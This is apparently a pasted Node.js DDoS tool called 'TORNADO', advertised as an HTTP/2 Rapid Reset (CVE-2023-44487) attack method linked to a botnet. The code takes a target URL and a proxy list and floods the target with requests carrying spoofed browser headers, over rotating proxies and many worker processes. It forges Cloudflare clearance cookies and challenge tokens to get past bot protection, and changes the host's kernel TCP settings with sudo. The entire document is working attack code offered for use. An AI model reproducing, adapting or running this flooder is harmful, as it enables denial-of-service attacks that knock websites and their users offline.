Untitled
public
Jun 11, 2024
Never
28
1 // made by @rapidreset aka mitigations for mesh botnet 2 const net = require('net'); 3 const tls = require('tls'); 4 const HPACK = require('hpack'); 5 const cluster = require('cluster'); 6 const fs = require('fs'); 7 const os = require('os'); 8 const crypto = require('crypto'); 9 const { exec } = require('child_process'); 10 11 const ignoreNames = ['RequestError', 'StatusCodeError', 'CaptchaError', 'CloudflareError', 'ParseError', 'ParserError', 'TimeoutError', 'JSONError', 'URLError', 'InvalidURL', 'ProxyError']; 12 const ignoreCodes = ['SELF_SIGNED_CERT_IN_CHAIN', 'ECONNRESET', 'ERR_ASSERTION', 'ECONNREFUSED', 'EPIPE', 'EHOSTUNREACH', 'ETIMEDOUT', 'ESOCKETTIMEDOUT', 'EPROTO', 'EAI_AGAIN', 'EHOSTDOWN', 'ENETRESET', 'ENETUNREACH', 'ENONET', 'ENOTCONN', 'ENOTFOUND', 'EAI_NODATA', 'EAI_NONAME', 'EADDRNOTAVAIL', 'EAFNOSUPPORT', 'EALREADY', 'EBADF', 'ECONNABORTED', 'EDESTADDRREQ', 'EDQUOT', 'EFAULT', 'EHOSTUNREACH', 'EIDRM', 'EILSEQ', 'EINPROGRESS', 'EINTR', 'EINVAL', 'EIO', 'EISCONN', 'EMFILE', 'EMLINK', 'EMSGSIZE', 'ENAMETOOLONG', 'ENETDOWN', 'ENOBUFS', 'ENODEV', 'ENOENT', 'ENOMEM', 'ENOPROTOOPT', 'ENOSPC', 'ENOSYS', 'ENOTDIR', 'ENOTEMPTY', 'ENOTSOCK', 'EOPNOTSUPP', 'EPERM', 'EPIPE', 'EPROTONOSUPPORT', 'ERANGE', 'EROFS', 'ESHUTDOWN', 'ESPIPE', 'ESRCH', 'ETIME', 'ETXTBSY', 'EXDEV', 'UNKNOWN', 'DEPTH_ZERO_SELF_SIGNED_CERT', 'UNABLE_TO_VERIFY_LEAF_SIGNATURE', 'CERT_HAS_EXPIRED', 'CERT_NOT_YET_VALID', 'ERR_SOCKET_BAD_PORT']; 13 14 require("events").EventEmitter.defaultMaxListeners = Number.MAX_VALUE; 15 16 process 17 .setMaxListeners(0) 18 .on('uncaughtException', function (e) { 19 console.log(e) 20 if (e.code && ignoreCodes.includes(e.code) || e.name && ignoreNames.includes(e.name)) return false; 21 }) 22 .on('unhandledRejection', function (e) { 23 if (e.code && ignoreCodes.includes(e.code) || e.name && ignoreNames.includes(e.name)) return false; 24 }) 25 .on('warning', e => { 26 if (e.code && ignoreCodes.includes(e.code) || e.name && ignoreNames.includes(e.name)) return false; 27 }) 28 .on("SIGHUP", () => { 29 return 1; 30 }) 31 .on("SIGCHILD", () => { 32 return 1; 33 }); 34 35 const statusesQ = [] 36 let statuses = {} 37 let isFull = process.argv.includes('--full'); 38 let custom_table = 65535; 39 let custom_window = 6291456; 40 let custom_header = 262144; 41 let custom_update = 15663105; 42 let timer = 0; 43 44 45 const timestamp = Date.now(); 46 const timestampString = timestamp.toString().substring(0, 10); 47 const currentDate = new Date(); 48 const targetDate = new Date('2024-03-30'); 49 50 const PREFACE = "PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"; 51 const reqmethod = process.argv[2]; 52 const target = process.argv[3]; 53 const time = process.argv[4]; 54 const threads = process.argv[5]; 55 const ratelimit = process.argv[6]; 56 const proxyfile = process.argv[7]; 57 const queryIndex = process.argv.indexOf('--query'); 58 const query = queryIndex !== -1 && queryIndex + 1 < process.argv.length ? process.argv[queryIndex + 1] : undefined; 59 const bfmFlagIndex = process.argv.indexOf('--bfm'); 60 const bfmFlag = bfmFlagIndex !== -1 && bfmFlagIndex + 1 < process.argv.length ? process.argv[bfmFlagIndex + 1] : undefined; 61 const delayIndex = process.argv.indexOf('--delay'); 62 const delay = delayIndex !== -1 && delayIndex + 1 < process.argv.length ? parseInt(process.argv[delayIndex + 1]) : 0; 63 const cookieIndex = process.argv.indexOf('--cookie'); 64 const cookieValue = cookieIndex !== -1 && cookieIndex + 1 < process.argv.length ? process.argv[cookieIndex + 1] : undefined; 65 const refererIndex = process.argv.indexOf('--referer'); 66 const refererValue = refererIndex !== -1 && refererIndex + 1 < process.argv.length ? process.argv[refererIndex + 1] : undefined; 67 const postdataIndex = process.argv.indexOf('--postdata'); 68 const postdata = postdataIndex !== -1 && postdataIndex + 1 < process.argv.length ? process.argv[postdataIndex + 1] : undefined; 69 const randrateIndex = process.argv.indexOf('--randrate'); 70 const randrate = randrateIndex !== -1 && randrateIndex + 1 < process.argv.length ? process.argv[randrateIndex + 1] : undefined; 71 const customHeadersIndex = process.argv.indexOf('--header'); 72 const customHeaders = customHeadersIndex !== -1 && customHeadersIndex + 1 < process.argv.length ? process.argv[customHeadersIndex + 1] : undefined; 73 74 const customIPindex = process.argv.indexOf('--ip'); 75 const customIP = customIPindex !== -1 && customIPindex + 1 < process.argv.length ? process.argv[customIPindex + 1] : undefined; 76 77 const customUAindex = process.argv.indexOf('--useragent'); 78 const customUA = customUAindex !== -1 && customUAindex + 1 < process.argv.length ? process.argv[customUAindex + 1] : undefined; 79 80 const forceHttpIndex = process.argv.indexOf('--http'); 81 const useLegitHeaders = process.argv.includes('--legit'); 82 const forceHttp = forceHttpIndex !== -1 && forceHttpIndex + 1 < process.argv.length ? process.argv[forceHttpIndex + 1] == "mix" ? undefined : parseInt(process.argv[forceHttpIndex + 1]) : "2"; 83 const debugMode = process.argv.includes('--debug') && forceHttp != 1; 84 85 if (!reqmethod || !target || !time || !threads || !ratelimit || !proxyfile) { 86 console.clear(); 87 console.error(` 88 TORNADO v2.1 Method With RST STREAM (CVE-2023-44487) // Updated: 01.05.2024 // With love @resetcve 89 Developers to method: @resetcve - developer method // @shiftwise - recoding method 90 How to use & example: 91 node ${process.argv[1]} <GET/POST> <target> <time> <threads> <ratelimit> <proxy> 92 node ${process.argv[1]} GET "https://target.com?q=%RAND%" 120 16 90 proxy.txt --query 1 --cookie "uh=good" --delay 1 --bfm true --referer rand --postdata "user=f&pass=%RAND%" --debug --randrate --full 93 94 Options: 95 --query 1/2/3 - query string with rand ex 1 - ?cf__chl_tk 2 - ?fwfwfwfw 3 - ?q=fwfwwffw 96 --delay <1-1000> - delay between requests 1-100 ms (optimal) default 1 ms 97 --cookie "f=f" - for custom cookie - also cookie support %RAND% ex: "bypassing=%RAND%" 98 --bfm true/null - bot fight mode change to true if you need dont use if no need 99 --referer https://target.com / rand - use custom referer if you need and rand - if you need generate domains ex: fwfwwfwfw.net 100 --postdata "user=f&pass=%RAND%" - if you need data to post req method format "user=f&pass=f" 101 --randrate - randomizer rate 1 to 90 good bypass to rate 102 --full - this new func for attack only big backend ex amazon akamai and other... support cf 103 --http 1/2/mix - new func choose to type http 1/2/mix (mix 1 & 2) 104 --debug - show your status code (maybe low rps to use more resource) 105 --header "f:f" or "f:f#f1:f1" - if you need this use custom headers split each header with # 106 --legit - this new func for attack with full legit headers non for cf 107 `); 108 process.exit(1); 109 } 110 111 let hcookie = ''; 112 113 const url = new URL(target) 114 const proxy = fs.readFileSync(proxyfile, 'utf8').replace(/\r/g, '').split('\n') 115 116 if (!['GET', 'POST', 'HEAD', 'OPTIONS'].includes(reqmethod)) { 117 console.error('Error request method only can GET/POST/HEAD/OPTIONS'); 118 process.exit(1); 119 } 120 121 if (!target.startsWith('https://') && !target.startsWith('http://')) { 122 console.error('Error protocol can only https:// or http://'); 123 process.exit(1); 124 } 125 126 if (isNaN(time) || time <= 0) { 127 console.error('Error invalid time format') 128 process.exit(1); 129 } 130 131 if (isNaN(threads) || threads <= 0 || threads > 256) { 132 console.error('Error threads format') 133 process.exit(1); 134 } 135 136 if (isNaN(ratelimit) || ratelimit <= 0) { 137 console.error(`Error ratelimit format`) 138 process.exit(1); 139 } 140 141 if (bfmFlag && bfmFlag.toLowerCase() === 'true') { 142 hcookie = `cf_clearance=${randstr(22)}_${randstr(1)}.${randstr(3)}.${randstr(14)}-${timestampString}-1.0-${randstr(6)}+${randstr(80)}=`; 143 } 144 145 if (cookieValue) { 146 if (cookieValue === '%RAND%') { 147 hcookie = hcookie ? `${hcookie}; ${ememmmmmemmeme(6, 6)}` : ememmmmmemmeme(6, 6); 148 } else { 149 hcookie = hcookie ? `${hcookie}; ${cookieValue}` : cookieValue; 150 } 151 } 152 153 function encodeFrame(streamId, type, payload = "", flags = 0) { 154 let frame = Buffer.alloc(9) 155 frame.writeUInt32BE(payload.length << 8 | type, 0) 156 frame.writeUInt8(flags, 4) 157 frame.writeUInt32BE(streamId, 5) 158 if (payload.length > 0) 159 frame = Buffer.concat([frame, payload]) 160 return frame 161 } 162 163 function decodeFrame(data) { 164 const lengthAndType = data.readUInt32BE(0) 165 const length = lengthAndType >> 8 166 const type = lengthAndType & 0xFF 167 const flags = data.readUint8(4) 168 const streamId = data.readUInt32BE(5) 169 const offset = flags & 0x20 ? 5 : 0 170 171 let payload = Buffer.alloc(0) 172 173 if (length > 0) { 174 payload = data.subarray(9 + offset, 9 + offset + length) 175 176 if (payload.length + offset != length) { 177 return null 178 } 179 } 180 181 return { 182 streamId, 183 length, 184 type, 185 flags, 186 payload 187 } 188 } 189 190 function encodeSettings(settings) { 191 const data = Buffer.alloc(6 * settings.length) 192 for (let i = 0; i < settings.length; i++) { 193 data.writeUInt16BE(settings[i][0], i * 6) 194 data.writeUInt32BE(settings[i][1], i * 6 + 2) 195 } 196 return data 197 } 198 199 function encodeRstStream(streamId, type, flags) { 200 const frameHeader = Buffer.alloc(9); 201 frameHeader.writeUInt32BE(4, 0); 202 frameHeader.writeUInt8(type, 4); 203 frameHeader.writeUInt8(flags, 5); 204 frameHeader.writeUInt32BE(streamId, 5); 205 const statusCode = Buffer.alloc(4).fill(0); 206 return Buffer.concat([frameHeader, statusCode]); 207 } 208 209 const getRandomChar = () => { 210 const pizda4 = 'abcdefghijklmnopqrstuvwxyz'; 211 const randomIndex = Math.floor(Math.random() * pizda4.length); 212 return pizda4[randomIndex]; 213 }; 214 215 function randstr(length) { 216 const characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; 217 let result = ""; 218 const charactersLength = characters.length; 219 for (let i = 0; i < length; i++) { 220 result += characters.charAt(Math.floor(Math.random() * charactersLength)); 221 } 222 return result; 223 } 224 225 if (url.pathname.includes("%RAND%")) { 226 const randomValue = randstr(6) + "&" + randstr(6); 227 url.pathname = url.pathname.replace("%RAND%", randomValue); 228 } 229 230 function randstrr(length) { 231 const characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._-"; 232 let result = ""; 233 const charactersLength = characters.length; 234 for (let i = 0; i < length; i++) { 235 result += characters.charAt(Math.floor(Math.random() * charactersLength)); 236 } 237 return result; 238 } 239 240 function generateRandomString(minLength, maxLength) { 241 const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; 242 const length = Math.floor(Math.random() * (maxLength - minLength + 1)) + minLength; 243 let result = ''; 244 for (let i = 0; i < length; i++) { 245 const randomIndex = Math.floor(Math.random() * characters.length); 246 result += characters[randomIndex]; 247 } 248 return result; 249 } 250 251 function ememmmmmemmeme(minLength, maxLength) { 252 const characters = 'abcdefghijklmnopqrstuvwxyz'; 253 const length = Math.floor(Math.random() * (maxLength - minLength + 1)) + minLength; 254 let result = ''; 255 for (let i = 0; i < length; i++) { 256 const randomIndex = Math.floor(Math.random() * characters.length); 257 result += characters[randomIndex]; 258 } 259 return result; 260 } 261 262 function getRandomInt(min, max) { 263 return Math.floor(Math.random() * (max - min + 1)) + min; 264 } 265 266 function buildRequest() { 267 const browserVersion = getRandomInt(120, 123); 268 269 const fwfw = ['Google Chrome', 'Brave']; 270 const wfwf = fwfw[Math.floor(Math.random() * fwfw.length)]; 271 272 let brandValue; 273 if (browserVersion === 120) { 274 brandValue = `"Not_A Brand";v="8", "Chromium";v="${browserVersion}", "${wfwf}";v="${browserVersion}"`; 275 } 276 else if (browserVersion === 121) { 277 brandValue = `"Not A(Brand";v="99", "${wfwf}";v="${browserVersion}", "Chromium";v="${browserVersion}"`; 278 } 279 else if (browserVersion === 122) { 280 brandValue = `"Chromium";v="${browserVersion}", "Not(A:Brand";v="24", "${wfwf}";v="${browserVersion}"`; 281 } 282 else if (browserVersion === 123) { 283 brandValue = `"${wfwf}";v="${browserVersion}", "Not:A-Brand";v="8", "Chromium";v="${browserVersion}"`; 284 } 285 286 const isBrave = wfwf === 'Brave'; 287 288 const acceptHeaderValue = isBrave 289 ? 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8' 290 : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'; 291 292 293 const langValue = isBrave 294 ? 'en-US,en;q=0.6' 295 : 'en-US,en;q=0.7'; 296 297 const userAgent = `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/${browserVersion}.0.0.0 Safari/537.36`; 298 const secChUa = `${brandValue}`; 299 const currentRefererValue = refererValue === 'rand' ? 'https://' + ememmmmmemmeme(6, 6) + ".net" : refererValue; 300 301 let mysor = '\r\n'; 302 let mysor1 = '\r\n'; 303 if (hcookie || currentRefererValue) { 304 mysor = '\r\n' 305 mysor1 = ''; 306 } else { 307 mysor = ''; 308 mysor1 = '\r\n'; 309 } 310 311 let headers = `${reqmethod} ${url.pathname} HTTP/1.1\r\n` + 312 `Accept: ${acceptHeaderValue}\r\n` + 313 'Accept-Encoding: gzip, deflate, br\r\n' + 314 `Accept-Language: ${langValue}\r\n` + 315 'Cache-Control: max-age=0\r\n' + 316 'Connection: Keep-Alive\r\n' + 317 `Host: ${url.hostname}\r\n` + 318 'Sec-Fetch-Dest: document\r\n' + 319 'Sec-Fetch-Mode: navigate\r\n' + 320 'Sec-Fetch-Site: none\r\n' + 321 'Sec-Fetch-User: ?1\r\n' + 322 'Upgrade-Insecure-Requests: 1\r\n' + 323 `User-Agent: ${userAgent}\r\n` + 324 `sec-ch-ua: ${secChUa}\r\n` + 325 'sec-ch-ua-mobile: ?0\r\n' + 326 'sec-ch-ua-platform: "Windows"\r\n' + mysor1; 327 328 if (hcookie) { 329 headers += `Cookie: ${hcookie}\r\n`; 330 } 331 332 if (currentRefererValue) { 333 headers += `Referer: ${currentRefererValue}\r\n` + mysor; 334 } 335 336 const mmm = Buffer.from(`${headers}`, 'binary'); 337 //console.log(headers.toString()); 338 return mmm; 339 } 340 341 const http1Payload = Buffer.concat(new Array(1).fill(buildRequest())) 342 343 function go() { 344 var [proxyHost, proxyPort] = '1.1.1.1:3128'; 345 346 if(customIP) { 347 [proxyHost, proxyPort] = customIP.split(':'); 348 } else { 349 [proxyHost, proxyPort] = proxy[~~(Math.random() * proxy.length)].split(':'); 350 } 351 352 let tlsSocket; 353 354 if (!proxyPort || isNaN(proxyPort)) { 355 go() 356 return 357 } 358 359 const netSocket = net.connect(Number(proxyPort), proxyHost, () => { 360 netSocket.once('data', () => { 361 tlsSocket = tls.connect({ 362 socket: netSocket, 363 ALPNProtocols: forceHttp === 1 ? ['http/1.1'] : forceHttp === 2 ? ['h2'] : forceHttp === undefined ? Math.random() >= 0.5 ? ['h2'] : ['http/1.1'] : ['h2', 'http/1.1'], 364 servername: url.host, 365 ciphers: 'TLS_AES_128_GCM_SHA256:TLS_AES_256_GCM_SHA384:TLS_CHACHA20_POLY1305_SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384', 366 sigalgs: 'ecdsa_secp256r1_sha256:rsa_pss_rsae_sha256:rsa_pkcs1_sha256', 367 secureOptions: crypto.constants.SSL_OP_NO_RENEGOTIATION | crypto.constants.SSL_OP_NO_TICKET | crypto.constants.SSL_OP_NO_SSLv2 | crypto.constants.SSL_OP_NO_SSLv3 | crypto.constants.SSL_OP_NO_COMPRESSION | crypto.constants.SSL_OP_NO_RENEGOTIATION | crypto.constants.SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION | crypto.constants.SSL_OP_TLSEXT_PADDING | crypto.constants.SSL_OP_ALL | crypto.constants.SSLcom, 368 secure: true, 369 minVersion: 'TLSv1.2', 370 maxVersion: 'TLSv1.3', 371 rejectUnauthorized: false 372 }, () => { 373 if (!tlsSocket.alpnProtocol || tlsSocket.alpnProtocol == 'http/1.1') { 374 375 if (forceHttp == 2) { 376 tlsSocket.end(() => tlsSocket.destroy()) 377 return 378 } 379 380 function doWrite() { 381 tlsSocket.write(http1Payload, (err) => { 382 if (!err) { 383 setTimeout(() => { 384 doWrite() 385 }, isFull ? 1000 : 1000 / ratelimit) 386 } else { 387 tlsSocket.end(() => tlsSocket.destroy()) 388 } 389 }) 390 } 391 392 doWrite() 393 394 tlsSocket.on('error', () => { 395 tlsSocket.end(() => tlsSocket.destroy()) 396 }) 397 return 398 } 399 400 if (forceHttp == 1) { 401 tlsSocket.end(() => tlsSocket.destroy()) 402 return 403 } 404 405 let streamId = 1 406 let data = Buffer.alloc(0) 407 let hpack = new HPACK() 408 hpack.setTableSize(4096) 409 410 const updateWindow = Buffer.alloc(4) 411 updateWindow.writeUInt32BE(custom_update, 0) 412 413 const frames = [ 414 Buffer.from(PREFACE, 'binary'), 415 encodeFrame(0, 4, encodeSettings([ 416 [1, custom_header], 417 [2, 0], 418 [4, custom_window], 419 [6, custom_table] 420 ])), 421 encodeFrame(0, 8, updateWindow) 422 ]; 423 424 tlsSocket.on('data', (eventData) => { 425 data = Buffer.concat([data, eventData]) 426 427 while (data.length >= 9) { 428 const frame = decodeFrame(data) 429 if (frame != null) { 430 data = data.subarray(frame.length + 9) 431 if (frame.type == 4 && frame.flags == 0) { 432 tlsSocket.write(encodeFrame(0, 4, "", 1)) 433 } 434 if (frame.type == 1 && debugMode) { 435 const status = hpack.decode(frame.payload).find(x => x[0] == ':status')[1] 436 if (!statuses[status]) 437 statuses[status] = 0 438 439 statuses[status]++ 440 } 441 if (frame.type == 7 || frame.type == 5) { 442 if (frame.type == 7) { 443 if (debugMode) { 444 445 //console.log("goaway", frame.payload.readUint32BE(0), frame.payload.readUint32BE(4)) 446 447 if (!statuses["GOAWAY"]) 448 statuses["GOAWAY"] = 0 449 450 statuses["GOAWAY"]++ 451 } 452 } 453 tlsSocket.write(encodeRstStream(0, 3, 0)); // beta 454 tlsSocket.end(() => tlsSocket.destroy()) // still beta 455 } 456 457 } else { 458 break 459 } 460 } 461 }) 462 463 tlsSocket.write(Buffer.concat(frames)) 464 465 function doWrite() { 466 if (tlsSocket.destroyed) { 467 return 468 } 469 //const fwq = getRandomInt(0,1); 470 const requests = [] 471 const customHeadersArray = []; 472 if (customHeaders) { 473 const customHeadersList = customHeaders.split('#'); 474 for (const header of customHeadersList) { 475 const [name, value] = header.split(':'); 476 if (name && value) { 477 customHeadersArray.push({ [name.trim().toLowerCase()]: value.trim() }); 478 } 479 } 480 } 481 let ratelimit; 482 if (randrate !== undefined) { 483 ratelimit = getRandomInt(1, 59); 484 } else { 485 ratelimit = process.argv[6]; 486 } 487 for (let i = 0; i < (isFull ? ratelimit : 1); i++) { 488 const browserVersion = getRandomInt(120, 123); 489 490 const fwfw = ['Google Chrome', 'Brave']; 491 const wfwf = fwfw[Math.floor(Math.random() * fwfw.length)]; 492 const ref = ["same-site", "same-origin", "cross-site"]; 493 const ref1 = ref[Math.floor(Math.random() * ref.length)]; 494 495 let brandValue; 496 if (browserVersion === 120) { 497 brandValue = `\"Not_A Brand\";v=\"8\", \"Chromium\";v=\"${browserVersion}\", \"${wfwf}\";v=\"${browserVersion}\"`; 498 } else if (browserVersion === 121) { 499 brandValue = `\"Not A(Brand\";v=\"99\", \"${wfwf}\";v=\"${browserVersion}\", \"Chromium\";v=\"${browserVersion}\"`; 500 } 501 else if (browserVersion === 122) { 502 brandValue = `\"Chromium\";v=\"${browserVersion}\", \"Not(A:Brand\";v=\"24\", \"${wfwf}\";v=\"${browserVersion}\"`; 503 } 504 else if (browserVersion === 123) { 505 brandValue = `\"${wfwf}\";v=\"${browserVersion}\", \"Not:A-Brand\";v=\"8\", \"Chromium\";v=\"${browserVersion}\"`; 506 } 507 508 const isBrave = wfwf === 'Brave'; 509 510 const acceptHeaderValue = isBrave 511 ? 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8' 512 : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'; 513 514 const langValue = isBrave 515 ? 'en-US,en;q=0.9' 516 : 'en-US,en;q=0.7'; 517 518 const secGpcValue = isBrave ? "1" : undefined; 519 520 const secChUaModel = isBrave ? '""' : undefined; 521 const secChUaPlatform = isBrave ? 'Windows' : undefined; 522 const secChUaPlatformVersion = isBrave ? '10.0.0' : undefined; 523 const secChUaMobile = isBrave ? '?0' : undefined; 524 525 var userAgent = `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/${browserVersion}.0.0.0 Safari/537.36`; 526 527 if(customUA) { 528 userAgent = customUA; 529 } else { 530 userAgent = `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/${browserVersion}.0.0.0 Safari/537.36`; 531 } 532 533 const secChUa = `${brandValue}`; 534 const currentRefererValue = refererValue === 'rand' ? 'https://' + ememmmmmemmeme(6, 6) + ".net" : refererValue; 535 const headers = Object.entries({ 536 ":method": reqmethod, 537 ":authority": url.hostname, 538 ":scheme": "https", 539 ":path": query ? handleQuery(query) : url.pathname + (postdata ? `?${postdata}` : ""), 540 }).concat(Object.entries({ 541 ...(Math.random() < 0.4 && { "cache-control": "max-age=0" }), 542 ...(reqmethod === "POST" && { "content-length": "0" }), 543 "sec-ch-ua": secChUa, 544 "sec-ch-ua-mobile": "?0", 545 "sec-ch-ua-platform": `\"Windows\"`, 546 "upgrade-insecure-requests": "1", 547 "user-agent": userAgent, 548 "accept": acceptHeaderValue, 549 ...(secGpcValue && { "sec-gpc": secGpcValue }), 550 ...(secChUaMobile && { "sec-ch-ua-mobile": secChUaMobile }), 551 ...(secChUaModel && { "sec-ch-ua-model": secChUaModel }), 552 ...(secChUaPlatform && { "sec-ch-ua-platform": secChUaPlatform }), 553 ...(secChUaPlatformVersion && { "sec-ch-ua-platform-version": secChUaPlatformVersion }), 554 ...(Math.random() < 0.5 && { "sec-fetch-site": currentRefererValue ? ref1 : "none" }), 555 ...(Math.random() < 0.5 && { "sec-fetch-mode": "navigate" }), 556 ...(Math.random() < 0.5 && { "sec-fetch-user": "?1" }), 557 ...(Math.random() < 0.5 && { "sec-fetch-dest": "document" }), 558 "accept-encoding": "gzip, deflate, br", 559 "accept-language": langValue, 560 ...(hcookie && { "cookie": hcookie }), 561 ...(currentRefererValue && { "referer": currentRefererValue }), 562 ...customHeadersArray.reduce((acc, header) => ({ ...acc, ...header }), {}) 563 }).filter(a => a[1] != null)); 564 565 const headers3 = Object.entries({ 566 ":method": reqmethod, 567 ":authority": url.hostname, 568 ":scheme": "https", 569 ":path": query ? handleQuery(query) : url.pathname + (postdata ? `?${postdata}` : ""), 570 }).concat(Object.entries({ 571 ...(Math.random() < 0.4 && { "cache-control": "max-age=0" }), 572 ...(reqmethod === "POST" && { "content-length": "0" }), 573 "sec-ch-ua": secChUa, 574 "sec-ch-ua-mobile": "?0", 575 "sec-ch-ua-platform": `\"Windows\"`, 576 "upgrade-insecure-requests": "1", 577 "user-agent": userAgent, 578 "accept": acceptHeaderValue, 579 ...(secGpcValue && { "sec-gpc": secGpcValue }), 580 ...(secChUaMobile && { "sec-ch-ua-mobile": secChUaMobile }), 581 ...(secChUaModel && { "sec-ch-ua-model": secChUaModel }), 582 ...(secChUaPlatform && { "sec-ch-ua-platform": secChUaPlatform }), 583 ...(secChUaPlatformVersion && { "sec-ch-ua-platform-version": secChUaPlatformVersion }), 584 "sec-fetch-site": currentRefererValue ? ref1 : "none", 585 "sec-fetch-mode": "navigate", 586 "sec-fetch-user": "?1", 587 "sec-fetch-dest": "document", 588 "accept-encoding": "gzip, deflate, br", 589 "accept-language": langValue, 590 //...(Math.random() < 0.4 && { "priority": `u=${fwq}, i` }), 591 ...(hcookie && { "cookie": hcookie }), 592 ...(currentRefererValue && { "referer": currentRefererValue }), 593 ...customHeadersArray.reduce((acc, header) => ({ ...acc, ...header }), {}) 594 }).filter(a => a[1] != null)); 595 596 const headers2 = Object.entries({ 597 ...(Math.random() < 0.3 && { [`x-client-session${getRandomChar()}`]: `none${getRandomChar()}` }), 598 ...(Math.random() < 0.3 && { [`sec-ms-gec-version${getRandomChar()}`]: `undefined${getRandomChar()}` }), 599 ...(Math.random() < 0.3 && { [`sec-fetch-users${getRandomChar()}`]: `?0${getRandomChar()}` }), 600 ...(Math.random() < 0.3 && { [`x-request-data${getRandomChar()}`]: `dynamic${getRandomChar()}` }), 601 }).filter(a => a[1] != null); 602 603 for (let i = headers2.length - 1; i > 0; i--) { 604 const j = Math.floor(Math.random() * (i + 1)); 605 [headers2[i], headers2[j]] = [headers2[j], headers2[i]]; 606 } 607 608 const combinedHeaders = useLegitHeaders ? headers3.concat() : headers.concat(headers2); 609 610 function handleQuery(query) { 611 if (query === '1') { 612 return url.pathname + '?__cf_chl_rt_tk=' + randstrr(30) + '_' + randstrr(12) + '-' + timestampString + '-0-' + 'gaNy' + randstrr(8); 613 } else if (query === '2') { 614 return url.pathname + '?' + generateRandomString(6, 7) + '&' + generateRandomString(6, 7); 615 } else if (query === '3') { 616 return url.pathname + '?q=' + generateRandomString(6, 7) + '&' + generateRandomString(6, 7); 617 } else { 618 return url.pathname; 619 } 620 } 621 622 const packed = Buffer.concat([ 623 Buffer.from([0x80, 0, 0, 0, 0xFF]), 624 hpack.encode(combinedHeaders) 625 ]); 626 627 requests.push(encodeFrame(streamId, 1, packed, 0x25)); 628 streamId += 2 629 } 630 631 tlsSocket.write(Buffer.concat(requests), (err) => { 632 if (!err) { 633 setTimeout(() => { 634 doWrite() 635 }, isFull ? 1000 : 1000 / ratelimit) 636 } 637 }) 638 } 639 640 doWrite() 641 }).on('error', () => { 642 tlsSocket.destroy() 643 }) 644 }) 645 646 netSocket.write(`CONNECT ${url.host}:443 HTTP/1.1\r\nHost: ${url.host}:443\r\nProxy-Connection: Keep-Alive\r\n\r\n`) 647 }).once('error', () => { }).once('close', () => { 648 if (tlsSocket) { 649 tlsSocket.end(() => { tlsSocket.destroy(); go() }) 650 } 651 }) 652 } 653 654 function TCP_CHANGES_SERVER() { 655 const congestionControlOptions = ['cubic', 'reno', 'bbr', 'dctcp', 'hybla']; 656 const sackOptions = ['1', '0']; 657 const windowScalingOptions = ['1', '0']; 658 const timestampsOptions = ['1', '0']; 659 const selectiveAckOptions = ['1', '0']; 660 const tcpFastOpenOptions = ['3', '2', '1', '0']; 661 662 const congestionControl = congestionControlOptions[Math.floor(Math.random() * congestionControlOptions.length)]; 663 const sack = sackOptions[Math.floor(Math.random() * sackOptions.length)]; 664 const windowScaling = windowScalingOptions[Math.floor(Math.random() * windowScalingOptions.length)]; 665 const timestamps = timestampsOptions[Math.floor(Math.random() * timestampsOptions.length)]; 666 const selectiveAck = selectiveAckOptions[Math.floor(Math.random() * selectiveAckOptions.length)]; 667 const tcpFastOpen = tcpFastOpenOptions[Math.floor(Math.random() * tcpFastOpenOptions.length)]; 668 669 const command = `sudo sysctl -w net.ipv4.tcp_congestion_control=${congestionControl} \ 670 net.ipv4.tcp_sack=${sack} \ 671 net.ipv4.tcp_window_scaling=${windowScaling} \ 672 net.ipv4.tcp_timestamps=${timestamps} \ 673 net.ipv4.tcp_sack=${selectiveAck} \ 674 net.ipv4.tcp_fastopen=${tcpFastOpen}`; 675 676 exec(command, () => { }); 677 } 678 679 setInterval(() => { 680 timer++; 681 }, 1000); 682 683 setInterval(() => { 684 if (timer <= 10) { 685 custom_header = custom_header + 1; 686 custom_window = custom_window + 1; 687 custom_table = custom_table + 1; 688 custom_update = custom_update + 1; 689 } else { 690 custom_table = 65536; 691 custom_window = 6291456; 692 custom_header = 262144; 693 custom_update = 15663105; 694 timer = 0; 695 } 696 }, 10000); 697 698 if (cluster.isMaster) { 699 700 const workers = {} 701 702 Array.from({ length: threads }, (_, i) => cluster.fork({ core: i % os.cpus().length })); 703 console.log(`Attack Start / @rapidreset love you <3 / TORNADO v1.5 (Beta Version)`); 704 705 cluster.on('exit', (worker) => { 706 cluster.fork({ core: worker.id % os.cpus().length }); 707 }); 708 709 cluster.on('message', (worker, message) => { 710 workers[worker.id] = [worker, message] 711 }) 712 if (debugMode) { 713 setInterval(() => { 714 715 let statuses = {} 716 for (let w in workers) { 717 if (workers[w][0].state == 'online') { 718 for (let st of workers[w][1]) { 719 for (let code in st) { 720 if (statuses[code] == null) 721 statuses[code] = 0 722 723 statuses[code] += st[code] 724 } 725 } 726 } 727 } 728 console.clear() 729 console.log(new Date().toLocaleString('us'), statuses) 730 }, 1000) 731 } 732 733 setInterval(TCP_CHANGES_SERVER, 5000); 734 setTimeout(() => process.exit(1), time * 1000); 735 736 } else { 737 let conns = 0 738 739 let i = setInterval(() => { 740 if (conns < 30000) { 741 conns++ 742 743 } else { 744 clearInterval(i) 745 return 746 } 747 go() 748 }, delay); 749 750 751 if (debugMode) { 752 setInterval(() => { 753 if (statusesQ.length >= 4) 754 statusesQ.shift() 755 756 statusesQ.push(statuses) 757 statuses = {} 758 process.send(statusesQ) 759 }, 250) 760 } 761 762 setTimeout(() => process.exit(1), time * 1000); 763 }